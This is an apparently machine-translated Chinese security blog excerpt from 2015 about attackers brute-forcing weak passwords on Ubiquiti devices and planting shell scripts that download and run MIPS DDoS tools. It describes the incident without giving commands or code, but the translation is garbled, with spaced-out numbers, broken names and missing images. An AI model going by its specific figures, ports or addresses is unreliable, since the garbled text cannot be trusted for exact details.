Threat warning: a lot of ubnt devices is Backdoor-vulnerability warning-the black bar safety net

2015-03-29T00:00:00
ID MYHACK58:62201560482
Type myhack58
Reporter 佚名
Modified 2015-03-29T00:00:00

Description

This article elaborated: the discovery of a hacker attack, intrusion analysis, counter hack Server, successfully obtain permission and complete evidence of the whole process. Such an invasion is now also very much, especially for a specific system of orientation, but“blind scan”in the attack.

Recently, the security constant security research team is monitoring to a large number of the use of weak passwords on 2 2 port for brute force attacks. After the security team a detailed analysis, we found that on the network a lot of ubnt devices there is a weak password, and a hacker using an automated tool to implant a back door. Ann constant APT network of early warning platform successfully detected this threat attack:

!

In a 3 on 1 9 May, to a customer network fault feedback, Ann constant the engineer to contact the Customer after the remote emergency response, in the client of a piece of equipment discovered some suspicious shell process.

!

The analysis found that these shell scripts the main function is through wget to download some suspicious file and run, and finally delete the downloaded file, resulting in a post-evidence of the difficulty.

We try to open comes to the malicious page are as follows:

!

!

From the above figure we can see that:

Suspicious ip: 2 2 2.. .62“1 0 0 1 0”file in one day download the 9 1 0 8

Suspicious ip: 1 8 0.. .241“hope9”file in 4 to 8 minutes to download a 3 9 6 times

After analysis, we found two suspicious files are MIPS architectureDDOStools, foreign researchers referred to as“Mr. Black”

!

The main function is to some of the common GET_Flood, a SYN_Flood, the UDP_Flood, etc. DDOSattack.

The next day, we continue to observe the found one malicious file downloads from the original 9 1 0 8 times into a 1 5 1 7 1

!

[1] [2] [3] next